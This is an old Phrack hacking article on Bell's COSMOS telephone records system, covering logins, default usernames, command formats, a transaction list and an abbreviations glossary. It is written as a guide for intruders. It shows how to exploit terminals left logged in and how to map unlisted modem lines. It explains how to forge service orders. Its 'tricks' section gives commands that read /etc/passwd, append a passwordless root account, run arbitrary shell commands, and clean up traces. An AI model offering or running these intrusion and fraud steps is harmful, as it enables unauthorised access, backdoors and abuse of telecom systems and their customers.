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| Volume Three, Issue Thirty-one, Phile #6 of 10 | |
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| BY | |
| ERIK BLOODAXE | |
| PRELUDE | |
| In the past, many files have been written about COSMOS. I | |
| have always been rather disappointed in their quality and in | |
| their presentation, so I have taken on the responsibility of | |
| doing one myself. This should sum up COSMOS for everyone who | |
| reads it. It contains formats for very useful commands, an | |
| entire transaction list, COSMOS "tricks", and a list of all COSMOS | |
| abbreviations and their formats. | |
| ============================================================================= | |
| INTRODUCTION | |
| Bell Labs COmputer System for Mainframe OperationS (COSMOS) | |
| is basically just a database for maintaining records of | |
| equipment and other line information and generating reports | |
| on that information. The system is usually set up on a DEC | |
| PDP 11/45 or 11/70. | |
| The main responsibilities of the COSMOS system are: | |
| Maintaining records | |
| Issuing reports | |
| Processing service and work orders | |
| Assigning telephone numbers | |
| Load balancing for switching computers | |
| Output of ESS recent change information | |
| LOGGING ON | |
| When connecting to COSMOS the system will respond with: | |
| ;Login: or LOGIN: | |
| at which point you enter a username. The system will then | |
| prompt: | |
| PASSWORD: | |
| at which point you enter the password for that username. | |
| Finally, the system will prompt: | |
| WC? | |
| which asks you to enter the wire center for the exchange you | |
| will be using in your work. After successfully completing | |
| the login sequence you will be given the system prompt which | |
| will be the two letter id of the wire center you entered and a | |
| percent sign: "WC% " | |
| To log off at this or at any point you can type control-y. | |
| One of the major flaws in COSMOS security is that unless a | |
| control-y is received the terminal is not logged out, even if | |
| the user disconnects. Many times when you connect to COSMOS, | |
| you will be dropped right into the "WC% " prompt. This even | |
| happens on major BOC packet networks quite often. If you are | |
| lucky enough to receive a 'WC#' prompt you have access to the | |
| COSNIX shell, and can issue various unix-like commands, like | |
| ls, cd, cat, et cetera. | |
| COSMOS usernames are usually issued as two letters corresponding to | |
| whatever center will be using that account, and two numbers. | |
| EX: LA01 | |
| Using the above example "LA01" there will most probably be numerous | |
| "LA" accounts, possibly "LA01" through "LA15" or higher. This is true | |
| for most COSMOS usernames. More often than not, all accounts used by the | |
| same center will have the same password as well. Some common usernames | |
| and their owners are: | |
| ROOT System Manager | |
| SYS System Manager | |
| ML Loop Assignment | |
| LA Loop Assignment | |
| DN Main Distributing Frame | |
| IN Repair Service | |
| RS Repair Service | |
| CE LNAC | |
| LK Account to execute INQuiries only | |
| JA Mizar | |
| WLI Work Load Indicator | |
| Usernames may vary from BOC to BOC, but these are fairly standard. | |
| ============================================================================= | |
| COSMOS TRANSACTION COMMANDS | |
| COSMOS commands are three letter acronyms. I will explain in | |
| depth the commands I have found most useful, and then list | |
| the remainder. Remember, do not attempt to learn the formats for COSMOS | |
| transactions online. You will probably not figure out correct inputs, and | |
| will most likely cause problems for the system manager and yourself. | |
| Commands are entered in a specific ways. The command desired is | |
| entered at the WC% prompt. A second string of data is entered at | |
| the next line which designates the type of transaction desired. | |
| This line is prefixed with on of the following four letters: | |
| H - Header Line | |
| I - In Line | |
| O - Out Line | |
| R - Remark Line | |
| The most commonly used line is the H line. It is a required input in | |
| almost all COSMOS transactions. From the second line on, COSMOS will | |
| prompt with an underscore "_" as the system prompt, to let the user | |
| know that it is waiting for input. When all needed data has been entered, | |
| the command is executed by typing a "." at the beginning of a new line. | |
| If you wish to process a command, but stay in command level in order to | |
| process further commands after the one you are currently entering has | |
| finished, a ";" can be entered at the beginning of a new line. | |
| To cancel the transaction you are entering, a "Q" should be entered at | |
| the beginning of a new line. To interrupt output, the break character | |
| is "^C". When entering criteria, you may enter all like data (all H-line, all | |
| I-line, etc...) on one line using a "/" between input prefixes: | |
| EX: H TN 222-0000,222-9999/RMKT SWBT?/US 1FB | |
| is the same as entering: | |
| H TN 222-0000,222-9999 | |
| _H RMKT SWBT? | |
| _H US 1FB | |
| One of the most commonly used commands is INQ (Complete | |
| Circuit Inquiry). There is also a short form of INQ called | |
| ISH. This command requires only the use of H lines. Multiple H lines | |
| can be entered to narrow a search or to print multiple reports. | |
| Valid H line facilities used are: | |
| BL Bridge Lifter | |
| CON Concentrator | |
| CP Cable Pair | |
| CKID Circuit ID | |
| MR Message Register | |
| OE Office Equipment Number | |
| PL Private Line Circuit Number | |
| TK Trunk Cable and Pair Number | |
| TN Telephone Number | |
| TP Tie Pair | |
| XN "X" Number | |
| TRE Transmission Equipment | |
| TER Terminal Number | |
| GP Group Number | |
| ORD Work Order | |
| EX: To print information on telephone number 222-2222 | |
| WC% INQ | |
| H TN 222-2222 | |
| _. | |
| EX: To print information on cable pair 11-1111 | |
| WC% INQ | |
| H CP 11-1111 | |
| _. | |
| INQ will print a full report whatever circuit you examine, while ISH | |
| will print a shorter, easier to read report. Below is an actual ISH | |
| done on a Telenet node. | |
| CA% ISH | |
| H TN 225-8004 | |
| _. | |
| TN 225-8004 | |
| ST AU DATE 06-03-83 HT GP 0-0081 BTN 225-8004 TYPE X | |
| OE 006-012-200 | |
| ST WK DATE 03-04-86 CS 1FBH US 1BH FEA TNNL | |
| LCC TF2 | |
| LOC WF12003 | |
| TER 0-0081-0001 | |
| ST WK | |
| RMKG GTE.TELENET | |
| CP 95-0701 | |
| ST WK DATE 01-24-86 RZ 13 | |
| LOC WF12009 | |
| TP 6105-0910 | |
| ST WK DATE 01-24-86 | |
| LOC F12003 | |
| LOC F42001 | |
| FROM FAC OE 006-012-200 TO FAC TP 6206-0107 | |
| TP 6206-0107 | |
| ST WK DATE 01-24-86 | |
| LOC F22029 | |
| LOC F42002 | |
| HUNT SEQUENCE FOR TN 225-8004 | |
| TER 0001-0040 | |
| ** ISH COMPLETED 02-29-99 12:00 | |
| CA% | |
| When you pull an inquiry on a number that you are interested in, you will | |
| be given its cable pair, its order number, any numbers that connect to | |
| it through a hunt sequence, and you will see any remarks entered about the | |
| number. This information can prove to be very valuable. For instance: | |
| You suspect that a company has a modem online, yet you don't want to waste | |
| time sequentially dialing thousands of numbers. You can simply enter | |
| an ISH on the number to get its cable pair, then begin pulling ISH | |
| reports on cable pairs close to the main one. Then you need only dial | |
| twenty or so numbers that are in the same area as the main number, and | |
| you will find the computer. | |
| Another extremely valuable command is SIR (Sorting Inquiry by Range). | |
| With SIR, you can print the circuit information on all lines that match | |
| specified criteria within a specified range of numbers. This command | |
| requires only H line input, but numerous lines may be entered in order to | |
| narrow down the search. You may also use the wildcard character ("?") to | |
| encompass a larger range when doing a SIR. There are many applications | |
| for SIR, but I will only show examples on a few I have found to be | |
| most useful. | |
| Many times entries have special remarks entered about the circuit. These | |
| are usually entered as RMKT (Remarks on Telephone Number), but they may be | |
| entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable | |
| Pair), depending upon what the person entering felt like typing. | |
| Most of the time the remarks really don't correspond like they should. | |
| Telephone companies are pretty thorough about remarking on a line that | |
| they own and they will usually use the RMKT prefix. | |
| EX: To find all telephone company (Southwestern Bell) lines in prefix 222 | |
| WC% SIR | |
| H TN 222-0000,222-9999 | |
| _H RMKT SWBT? | |
| _. | |
| The "?" after SWBT acts as a wildcard. Typing SWB? would perform the same | |
| search. | |
| You may also want to search by STT (Telephone number status). Some types of | |
| STT are: | |
| AU Auxiliary | |
| NP Non-published | |
| OF Official (telco owned) | |
| TS Test | |
| Another way to distinguish types of number is by CS (Customer Class of | |
| Service). CS values tend to vary from BOC to BOC, but business lines | |
| will usually look like "1FB", or at least contain a "B". Residences | |
| will usually look like "1FR." Sometimes telco lines are listed as "1OF", | |
| but may also be entered as "1FB". On lines in a hunt group, the CS will | |
| be appended with the letter "H", as "1FBH". | |
| Let's say a company owns a block on an exchange (333) running from 1000 to | |
| 3500. You want to find all possible computer numbers in that area. Chances | |
| are good that they are not listed. | |
| EX: | |
| WC% SIR | |
| H TN 333-1000,333-3500 | |
| _H STT NP | |
| _H CS 1FB | |
| _. | |
| The above would list all non-published business numbers from 333-1000 | |
| to 333-3500. | |
| To find all numbers that are translated 800 numbers in the same prefix range | |
| as above, you can do the following: | |
| EX: | |
| WC% SIR | |
| H TN 333-1000,333-3500 | |
| _H PL ?800? | |
| _. | |
| This will prints reports on all private lines registered as 800 numbers. | |
| There is also a shorter version of SIR, LTN (List Telephone Numbers), and a | |
| more detailed version, GFR (General Facility Report), but I have found | |
| SIR to be the better of the three to use for my purposes. | |
| In order to change line attributes, or to create new lines you will need | |
| to use two commands SOE (Service Order Entry), and RCP (Recent Change | |
| Packager). These two commands are pretty detailed in what they can do, | |
| so I will just cover a few of their options. | |
| SOE will allow you to assign a new circuit, and specify the desired telephone | |
| number, custom calling features, billing telephone number, etc. | |
| SOE requires both "H" and "I" lines of input. The best way to enter | |
| a new service order is to have COSMOS pick your new telephone number and | |
| assign the needed office equipment number. If you want to pick your own | |
| telephone number, the number you pick must have a status (STO) of SP, LI, RS, | |
| or PD (with a disconnect date before the due date on your new service order). | |
| This is so that you do not try to assign a number that is currently working | |
| to your new service order. You can check this by doing an ISH on all the | |
| variations of numbers you desire, and checking the STO. You can also get a | |
| list of available numbers in a given prefix using the NAI command. You | |
| should also do a SIR of recent entries, to try to find the proper format of | |
| order numbers, so that you do not reuse one, or make one up that is formatted | |
| incorrectly. Another method to make sure that you have the correct formatting | |
| of order numbers is to call the phone company and request the installation of | |
| a line in the area you are working in. They will tell you your service order | |
| number for reference. Later, you can merely cancel the order. You will also | |
| have to find a valid cable pair, so do an ISH on whatever number written in | |
| your junction box that is not working, and then make sure there is no pending | |
| connect orders entered on it. | |
| To enter a service order for a new connection, having COSMOS pick an available | |
| telephone number and assign proper office equipment numbers, you would do | |
| the following: | |
| EX: | |
| WC% SOE | |
| H ORD SO123456/OT NC/DD DD-MM-YY (Use valid Day, Month, Year for Due Date) | |
| _I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY (Use valid cable pair for XX-YYYY) | |
| _. | |
| You would now need to enter RCP and make a correctly formatted recent change | |
| report for the order you entered so RCMAC can pick up the order and directly | |
| enter it into the switch. What RCP does is take your order and change it into | |
| actual switch programming, using templates that are stored in directories | |
| corresponding to what type of switching equipment is used for that WC. | |
| (EX: ess5a) | |
| EX: To create a recent change package for the order entered above | |
| WC% RCP | |
| H ORD SO123455 | |
| _. | |
| Using SOE you can specify custom calling features, you can specify billing | |
| telephone numbers, you can establish service as coin, and several other | |
| options by adding "I" line information corresponding to that particular | |
| option. | |
| _I CCF XXXXXX (XXXXXX is valid custom calling features) | |
| _I BTN NNX-XXXX (NNX-XXXX is valid billing TN) | |
| _I TT C | |
| To get a list of spare (available) telephone numbers in a given prefix, you | |
| can use the NAI (Telephone Number Assignment Inquiry) command. You only need | |
| enter H line criteria. In addition to searching by prefix (NNX), you can | |
| search by switch type (TYP), or rate zone (RTZ). | |
| EX: To select one spare telephone number in 555 and make it reserved status | |
| WC% NAI | |
| H TT X/NNX 555/STT RS | |
| _. | |
| You may also have NAI print out several available numbers, however, you cannot | |
| change the status unless you are printing one listing. | |
| EX: | |
| WC% NAI | |
| H TT X/NNX 555/LC XX (Where XX is a number between 1 and 25) | |
| _. | |
| To get a listing of all prefixes that exist in the Wire Center you are | |
| logged in under, you can use the command DDS (Display DS Table). This | |
| command will list the ranges that exist for a given input. | |
| To list all telephone numbers in a given WC: | |
| WC% DDS | |
| H TN ? | |
| _. | |
| To list all cable pair ranges: | |
| WC% DDS | |
| H CP ? | |
| _. | |
| To change from one Wire Center to another, you use the command WCC (Wire | |
| Center Change). This is a very straight forward command. | |
| EX: | |
| WC% WCC NW | |
| NW% | |
| To allow for redirection in your COSMOS commands, you must execute the | |
| DIO command. This command is rather important for manipulating commands | |
| to work for you. | |
| EX: | |
| WC% DIO | |
| To see what transactions other people logged in are running, you can use the | |
| command TSNAP (on certain generics) | |
| EX: | |
| WC% TSNAP | |
| There are about one hundred other COSMOS commands that are all defined at the | |
| end of this file. I cannot go into detail on all of them but I will list them | |
| and their meanings. | |
| ============================================================================= | |
| COSMOS TRICKS | |
| Even if you don't have full COSNIX access, you can basically execute | |
| any command or read any file that exists in the system. Using the INQ | |
| (or ISH) command and redirection, you can open and display any file. | |
| EX: To display the password file | |
| WC% INQ </ETC/PASSWD | |
| This will display the file, however, since this is a flaw in the command, | |
| it thinks the file is to be input for INQ, and each line will be preceded | |
| with "ILLEGAL LINE TYPE", but this can be ignored. | |
| Other files to look at: | |
| /USR/FACS/WCFILE List of all Wire Centers | |
| /ETC/MATRIX.P Permission Matrix (Who can execute what commands) | |
| You may or may not want to try the following. There is a high probability | |
| that you will be noticed on the system. If your local COSMOS ports are | |
| usually left logged in, don't bother doing this. However, if your COSMOS | |
| ports are always logged out, and you almost never get in, and you happen | |
| to stumble upon one left logged for the first time in months, it might be | |
| worth a try. | |
| There are a few ways to make a new account on COSMOS; however, you need to | |
| be able to write to the password file. Some systems allow this, but most do | |
| not. | |
| The easiest way involves using the echo command and redirection. | |
| EX: | |
| WC% echo "EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so" >>/etc/passwd | |
| This will add user EB01 to the end of the password file. | |
| If you do not have access to echo you can do the same thing using the TED | |
| command (Text Editor). | |
| WC% TED >>/etc/passwd | |
| S.O. NO.= SO123456 | |
| IS THIS A NEW S.O. (Y on NO) Y | |
| 1d | |
| a | |
| EB01::0::y:1:/tmp:/usr/cosmos:/usr/preop:/usr/so | |
| ^C | |
| 1p | |
| w | |
| q | |
| After executing the above, you will need to clean up the /etc/passwd | |
| file to remove the Service Order information put in there by TED. You will | |
| also need to remove the service order you created from the /usr/so/WC | |
| directory. | |
| If you cannot find a way to get shell access, you can still execute | |
| any COSNIX command you desire again using TED, MSK (Output a Transaction | |
| Mask), and ARG (Assemble and Run a Given Master File). | |
| EX: | |
| WC% TED | |
| S.O. NO.= SO123456 | |
| IS THIS A NEW S.O. (Y or NO) Y | |
| 12 | |
| 1d | |
| a | |
| $* | |
| run! | |
| ^c | |
| w | |
| q | |
| WC% MSK >/usr/so/newcmd | |
| SO123456 | |
| WC% ARG | |
| newcmd ls /etc | |
| To execute the command, you need to do ARG, then the name of the | |
| file (which I called newcmd), then the COSNIX command you wish to | |
| execute. | |
| If you can use echo this can be done much easier. | |
| EX: | |
| WC% echo '$*' >/usr/so/newcmd | |
| WC% echo 'run!' >>/usr/so/newcmd | |
| Then you can run your command normally with ARG. | |
| WC% ARG | |
| newcmd cd .. | |
| IF you do not have access to echo, create a newcmd file and you can use it | |
| that way. | |
| WC% ARG | |
| newcmd echo EB01::0::y:1:/tmp:/usr/cosmos:/usr/so:/usr/preop >>/etc/passwd | |
| ============================================================================= | |
| COSMOS COMMAND LISTING | |
| ACE Establish an Assignment Change Ticket | |
| AIT ANALIT Initialization of Tables | |
| ARG Assemble and Run a Given Master File | |
| AUD Assignment List Audit | |
| BAI Bridge Lifter Assignment Inquiry | |
| BYF Display the Bypass File | |
| BYP Change the Contents of the Bypass File | |
| CAY Create an Assembly | |
| CCA Change Customer Attributes | |
| CCT Initialize and Update the Contractor-Transducer File | |
| CDA Change Distribution Attributes | |
| CDD Change Due Date | |
| CDR Cut Thru DIP Report | |
| CFA Change Facility Attributes | |
| CFP Print the Class of Service/Features for an Electromechanical Entity | |
| CFU Change Facility Usage | |
| CIE Company Establish Company Initiated Change | |
| CLI COSMOS Processed ALIT Reports | |
| CPI COSMOS-PREMIS Interface | |
| CPM COSMOS Performance Monitor | |
| CTC Complete a Cable Transfer or Complete a Cable Throw | |
| CTE Cable Throw Order Establishment | |
| CTF Display the Contacter-Transducer File | |
| CTL Cable Throw with Line Equipment Assignment | |
| CTM Cable Throw Modification | |
| CTP Print Cable Transfer Frame Work | |
| CTR Cable Throw Replacement | |
| CTS Cable Throw Summary | |
| CTW Withdraw a Cable Transfer or a Cable Throw | |
| CUP Common Update Processor | |
| CXC Complex Service Order Input Checker | |
| CXM Centrex Table Management | |
| CXT Complex Order Inquiry for NAC Review | |
| DAY Delete an Assembly | |
| DBL Data Base Load | |
| DCN List Disconnected and Changed Numbers | |
| DDS Display the DS Table | |
| DIR Standard DIP Report | |
| DPN DIP Purge Number | |
| DPR DIP Report and Removal | |
| DQR Design Quota System Report | |
| DQS Design Quota System | |
| DTE Print Current Date | |
| EDZ Facility Emergency Assignment List | |
| ELA Entity Load Analysis | |
| ESP Print Entire Summary Table | |
| FDY Set Fiscal Day for LAC | |
| FLR Frame Layout Report | |
| FOR Frame Order Report | |
| FOS Frame Operations Summary | |
| FTA Frame Transfer Analysis | |
| FTC Frame Transfer Completion | |
| FTE Frame Transfer Establishment | |
| FTL Frame Transfer LETs | |
| FTR Frame Transfer Reprint | |
| FTW Frame Transfer Withdrawal | |
| FWM Frame Work Management | |
| GFR General Facility Report | |
| GLA Generate Lists for Assignment | |
| HBS Hunt Group Blocks of Spares | |
| HGR Hunt Group Report | |
| HGS Hunt Group Summary | |
| HIS Hunting ISH | |
| IJR Input a Jeopardy Reason | |
| IMU Input Measured CCS Usage Data | |
| INQ Complete Circuit Inquiry | |
| ISF Inquire on a Single Facility | |
| ISH Complete Circuit Inquiry Short | |
| JAM Jumper Activity Management | |
| JPH Jumper Placement History | |
| KPR Killer Pair Report | |
| KSM Create a Transaction Mask | |
| LAI Line Equipment Assignment Inquiry | |
| LBP Load Balance Parameters | |
| LCD LIST Cable Summary, LIT Demand Test | |
| LCP List Cable Pairs | |
| LEE NAC Related Line Equipment Transfer Order Establishment | |
| LEW Line Equipment Transfer Withdrawal | |
| LFC Load Factor Calculation | |
| LFR Line Failure Report | |
| LGN List Hunt Groups | |
| LIN Transmit ALIT Data to COSMOS | |
| LOE List Originating Line Equipment | |
| LSE Line and Station Transfer Order Establishment | |
| LSW Line and Station transfer Withdrawal | |
| LTN List Telephone Numbers | |
| MAL Manual Assignment List | |
| MAP Manual Assignment Parameters | |
| MAQ Manual Assignment File Inquiry | |
| MAY Modify an Assembly | |
| MCE Establish a Maintenance Change Ticket | |
| MCH Manually Change Hunt | |
| MCL Maintenance Change List | |
| MCR Establish a Maintenance Change Repair | |
| MCW Maintenance Change Ticket Withdrawal | |
| MDC Manually Disconnect a Working Circuit | |
| MEC Manually Establish a Circuit | |
| MMC Manually Modify a Circuit | |
| MOC MOE Order Completion | |
| MOE Mass OE Transfers | |
| MOF Mass OE Frame Transfer Listings | |
| MOW MOE Order Withdrawal | |
| MPK Modify Work Package | |
| MSK Output a Transaction Mask | |
| MTR Manually Test a Response | |
| NAI Telephone Number Assignment Inquiry | |
| NOL NAC Service Order Listing | |
| NSD Number Summary Display | |
| OIJ Orders in Jeopardy | |
| OPN Open-of-Day Report | |
| OPU Outside Plant Cable Usage | |
| PAK Work Packages | |
| PEP Position Establishment for Parties | |
| PFR Party Line Fill Report | |
| PRP Periodic Purging of Remarks | |
| QEX Question an Execution | |
| QUE Queue | |
| RAL Relay Assignment List | |
| RAP Relay Assignment Parameters | |
| RAS Release Sequence Number Lists and Related TN/OE | |
| RBS Print TBS Relays Assignment Record | |
| RCP Recent Change Packager | |
| RCR Recent Change Report | |
| RCS Recent Change Summary | |
| RED Recent Change Message Text Editor | |
| REL Release Non-Intercepted Numbers by Release Date | |
| REM Remove Frame Locations | |
| RET Retermination of Frame Locations | |
| REX Reexecute a Service Order | |
| RJR Remove Jeopardy Reason Codes | |
| RMP Recent Change Punctuation Table | |
| RNA Release Telephone Numbers for Assignment | |
| ROE Reservation Order Establishment | |
| ROI Reservation Order Inquiry | |
| ROW Reservation Order Withdrawal | |
| RTH Report Transaction to Count Spare and DIPed Line Equipment | |
| RTS Relay and Telephone Number Status Report | |
| RUP Request Unsolicited Processing | |
| SAI Summary of Action Items | |
| SCA Service Order Completion-Automatic | |
| SCF Simple Completion for MDF | |
| SCI Spare Cable Pair Inquiry | |
| SCM Standard Completion by MDF | |
| SCP Service Order Completion by LAC | |
| SCR Standard Completion by RCMAC | |
| SEL Selecting Lines for an Exchange Class of Service Study | |
| SET Statistics on Equipment and Telephone Numbers | |
| SGH Supply Relays for Groups of 5XB Hunts | |
| SIR Sorting Inquiry by Range | |
| SLC Subscriber Line Counts for Custom Calling Features | |
| SOC Service Order Cancel | |
| SOE Service Order Establishment | |
| SOF Service Order Fix | |
| SOH Service Order Withheld | |
| SOI Service Order Assignment Inquiry | |
| SOL Service Order Listing | |
| SOM Modify a Pending Service Order | |
| SOW Service Order Withdrawal | |
| STN Summarize Telephone Numbers | |
| SVL Service Observing Loops | |
| TAI Tie Pair Assignment Inquiry | |
| TAT Test Alignment of Frame Terminal | |
| TED Text Editor | |
| TET Display or Change Band Filter File, Retention Factor and Print Threshold | |
| TFC Transfer Frame Changes | |
| TIG Dial Transfer Input Generator | |
| TLC Translate LANAVAR/CPS | |
| TNS Telephone Number Swap | |
| TOC Transfer Order Completion | |
| TOE Transfer Order Establishment | |
| TOF Mass OE Transfer Order Frame Listings | |
| TOI Dial Transfer Order Inquiry | |
| TOL Transfer Order Lists | |
| TOO Transfer Order Omissions | |
| TOW Transfer Order Withdrawal | |
| TPU Tie Pair Usage Report | |
| TRC Transfer Order Recent Change Report | |
| TRI Transmission Equipment Assignment Inquiry | |
| TRW Total Reservation Order Withdrawal | |
| TSL Line Equipment Summary Report | |
| TSN Traffic Statistics on Telephone Numbers | |
| TSW Total Service Order Withdrawal | |
| TTY Get TTY Name | |
| TXC Text Checker | |
| TXM Transfer Centrex Management | |
| UDP Update DIP Parameters | |
| UES Update the Entity Summary Table | |
| UFO Unprinted Frame Orders | |
| UPC Update CCS vs. Class of Service Table | |
| USL List USOC (US) File Data | |
| UTC Update Table for Concentrator Redesign | |
| WCC Change Wire Center | |
| WCT Worksheet for Cable Throw Orders | |
| WFL Working Frame Location | |
| WOI Work Order Inquiry | |
| WOL Work Order Listing | |
| WPT Work Package Table | |
| WSL Work Status List | |
| WUL Work Unit Report for Subscriber Line Testing and Installation Assignment | |
| ============================================================================= | |
| COSMOS ABBREVIATIONS AND FORMATS | |
| The following will be given as follows: | |
| Prefix and Meaning | |
| Format | |
| Code Value and Meaning | |
| AC Assembly category | |
| AC XXXX | |
| PERM=Permanent Facility Assemblies | |
| TEMP=Temporary Facility Assemblies | |
| AC Assembly Code | |
| AC XXX | |
| XXX=1-999 | |
| ADSR Administration of Designed Services Review | |
| ADSR X | |
| Y=Yes, TIRKS Circuit | |
| N=No, COSMOS Circuit | |
| AGM Normal Aging Months | |
| AGM XX | |
| XX=Number of Months | |
| AGT Accelerated Aging Type | |
| AGT XXX | |
| BUS=Business | |
| RES=Residential | |
| AI Assigner's Initials | |
| AI XXX | |
| XXX=3 Alphanumeric Characters | |
| AO Allocation Order | |
| AO XX | |
| XX=Two Numeric Characters | |
| AR Advance Relay | |
| AR XYY-ZZZ | |
| X=Marker Group | |
| YY=Number Group from Frame | |
| ZZZ=Relay Number | |
| ATN Assigner's Telephone Number | |
| ATN XXX-XXXX | |
| XXX-XXXX=Assigners TN | |
| BL Bridge Lifter | |
| BL XX...XX | |
| XX...XX=Maximum of 17 Alphanumeric Characters | |
| BLS Bridge Lifter Status | |
| BLS X | |
| Y=Yes | |
| N=No | |
| BND Band Number | |
| BND X | |
| X=0-3 | |
| BTN Billing Telephone Number | |
| BTN XXX-XXXX | |
| XXX-XXXX=Billing Telephone Number | |
| CA Cable Number | |
| CA XX...XX | |
| XX...XX=Maximum of 10 Alphanumeric Characters | |
| CAT Centrex Access Treatment | |
| CAT XX | |
| XX=Maximum of 2 Numeric Characters | |
| CC Call Count | |
| CC XX | |
| XX=Maximum of 2 Numeric Characters | |
| CCF Custom Calling Features | |
| CCF XXXXXX | |
| XXXXXX=3 to 6 Alphanumeric Characters | |
| CCS Hundred Call Seconds | |
| CCS XXXX | |
| XXXX=3 or 4 Numeric Characters | |
| CEU CCS Estimated Usage | |
| CEU XXXX | |
| XXXX=3 or 4 Numeric Characters | |
| CG Control Group Number | |
| CG X | |
| X=0-9 | |
| CKID Circuit Identification | |
| CKID XX...XX | |
| XX..XX=Maximum of 61 Alphanumeric Characters | |
| CKL Circuit Location | |
| CKL XXXX | |
| XXXX=Maximum of 4 Alphanumeric Characters | |
| CLC Common Language Code for an Entity | |
| CLC XX...XX | |
| XX...XX=Maximum of 11 Alphanumeric Characters | |
| CLCI Common Language Circuit Identification | |
| CLCI XX...XX | |
| XX...XX=Maximum of 61 Alphanumeric Characters | |
| CLEI Common Language Equipment Identifier | |
| CLEI XX...XX | |
| XX...XX=Maximum of 10 Alphanumeric Characters | |
| CLF Creating DIPs Upper Bound Load Factor | |
| CLF XX | |
| XX=1-10 | |
| CLL Creating DIPs Lower Bound Load Factor | |
| CLF X | |
| X=1-9 | |
| CLS CLCI in Serial Number Format | |
| CLS XX...XX | |
| XX..XX=Maximum of 61 Alphanumeric Characters | |
| CLT CLCI Telephone Number Format | |
| CLT XX...XX | |
| XX...XX=Maximum of 61 Alphanumeric Characters | |
| CMF Capacity Main Station Fill | |
| CMF XXXXXX | |
| XXXXXX=Maximum of 6 Numeric Characters | |
| CMU CCS Measured Usage | |
| CMU XXXX | |
| XXXX=3 or 4 Numeric Characters | |
| COM Complement Size | |
| COM XXXX | |
| XXXX=1-9999 | |
| CON Concentrator | |
| CON XX-YY | |
| XX=Maximum of 2 Alphanumeric Characters | |
| YY=Maximum of 2 Numeric Characters | |
| CP Cable and Pair Number | |
| CP XX...XX-YZZZ | |
| XX...XX=Cable ID, Maximum of 10 Alphanumeric Characters | |
| YZZZ=Cable Pair ID | |
| Y=Alphanumeric | |
| ZZZ=Numeric | |
| CPU CCS Capacity Usage | |
| CPU XXXX | |
| XXXX=3 or 4 Numeric Characters | |
| CRG CREG Tag | |
| CRG XXX | |
| XXX=YES or NO | |
| CS Customer Class of Service | |
| CS XXXXXX | |
| XXXXXX=Maximum of 6 Alphanumeric Characters | |
| CTID Circuit Termination Identification | |
| CTID XX...XX | |
| XX...XX=Maximum of 61 Alphanumeric Characters | |
| CTT Cut Through Tag | |
| CTT XXX | |
| XXX=YES or NO | |
| CTX Centrex Group Number | |
| CTX XXXX | |
| XXXX=Maximum of 4 numeric Characters | |
| DC Dial Code | |
| DC X | |
| X=1 Alpha Characters | |
| DD Due Date | |
| DD MM-DD-YY | |
| MM=Month | |
| DD=Day | |
| YY=Year | |
| DID Direct Inward Dialing | |
| DID XXXX | |
| XXXX=Maximum of 4 Numeric Characters | |
| DIP DIP Creation Option | |
| DIP X | |
| Y=Yes | |
| N=No | |
| DNY Denial of Service for Non-payments | |
| DNY X | |
| I=Incoming | |
| O=Outgoing | |
| B=Both | |
| DPA Different Premises Address | |
| DPA XXX | |
| XXX=Maximum of 3 Alphanumeric Characters | |
| DPT Department Name | |
| DPT XXX | |
| XXX=Maximum of 3 Alphanumeric Characters | |
| DST Destination of Order Response | |
| DST XXXX | |
| XXXX=Maximum of 4 Alphanumeric Characters | |
| DT Due Time | |
| DT XX | |
| XX=AM, PM, or 0-9 | |
| EC ESS Entity and Control Group Number | |
| EC YZ | |
| Y=Entity Number | |
| Z=Control Group Identifier | |
| ECS Equipment Class of Service | |
| ECS XXXXXX | |
| XXXXXX=Maximum of 6 Alphanumeric Characters | |
| ED Enter Date | |
| ED MM-DD-YY | |
| MM=Month | |
| DD=Day | |
| YY=Year | |
| EN Entity | |
| EN X | |
| X=S, E, 1, 5 or 0 | |
| EN Entity Number | |
| EN X | |
| X=0-9 | |
| ENT Entity Number | |
| ENT X | |
| X=0-9 | |
| EO Error Handling Option | |
| EO XX | |
| CE=Continue Processing and Establish Valid Circuits | |
| CW=Continue Processing and Withdraw Established Circuits | |
| SE=Stop Processing and Establish Valid Circuits | |
| SW=Stop Processing and Withdraw Established Circuits | |
| EQF Equipment Features | |
| EQF WXYZ | |
| W=R (Rotary) or T (Touchtone) | |
| Y=S (Sleeve) X (Range Extension) or N (Non-sleeve or Non-range Extension) | |
| X=E (Essential) or N (Non-essential) | |
| Z=G (Ground Start) or L (Loop Start) | |
| EQV Frame Equivalence | |
| EQV FXX | |
| F=The Letter "F" | |
| XX=Two Alphanumeric Characters | |
| ETC Estimated Trunk CCS Value | |
| ETC XXXX | |
| XXXX=Maximum of 4 Alphanumeric Characters | |
| EXD ECS Crossloading Option | |
| EXD XXX | |
| XXX=YES or NO | |
| FAC Type of Segment List Being Audited | |
| FAC XX | |
| TN=Telephone Number | |
| OE=Line Equipment | |
| FAC Circuit Confiruration | |
| FAC XXX or | |
| FAC TN-NNX or | |
| FAC CP-XX...X or | |
| FAC SE-YY...Y or | |
| FAC PL-ZZ...Z | |
| XXX=Any Facility Prefix | |
| NNX=Three Alphanumeric Characters | |
| XX...XX=Maximum of 10 Alphanumeric Characters | |
| YY...YY=Maximum of 52 Alphanumeric Characters | |
| ZZ...ZZ=Maximum of 61 Alphanumeric Characters | |
| FC From Cable | |
| FC XX...XX | |
| XX...XX=Maximum of 10 Alphanumeric Characters | |
| FDD Frame Due Date | |
| FDD MM-DD-YY | |
| MM=Month | |
| DD=Day | |
| YY=Year | |
| FEA Customer Feature | |
| FEA XXXX | |
| (Same as EQF) | |
| FILT Filter | |
| FILT XXX | |
| XXX=Y, YES, N, or NO | |
| FR Frame Identification | |
| FR FXX | |
| F=The letter "F" | |
| XX=Two Alphanumeric Characters | |
| FT Frame Time | |
| FT XX | |
| XX=01-24 | |
| FW MDF Output Suppressed | |
| FW X | |
| Y=Frame Work Yes | |
| N=Frame Work No | |
| GP MLHG Group Number | |
| GP Y-XXXX | |
| Y=Alphanumeric Control Group | |
| XXXX=Numeric Group Number | |
| GSO Ground Start Option | |
| GSO X | |
| 1=Assigned to any OE in the Entity | |
| 2=Assigned to Even Levels | |
| 3=Only Assigned to OE Specified as Ground Start | |
| HC Hunt Count | |
| HC XXXX | |
| XXXX=Maximum of 4 Numeric Characters | |
| HF Hunt-from Telephone Number | |
| HF XXX-XXXX | |
| XXX-XXXX=Telephone Number | |
| HLC Highest Lead Factor Group Count | |
| HLC XXXX | |
| XXXX=1-9999 | |
| HR Held Order Reason Code | |
| HR XX | |
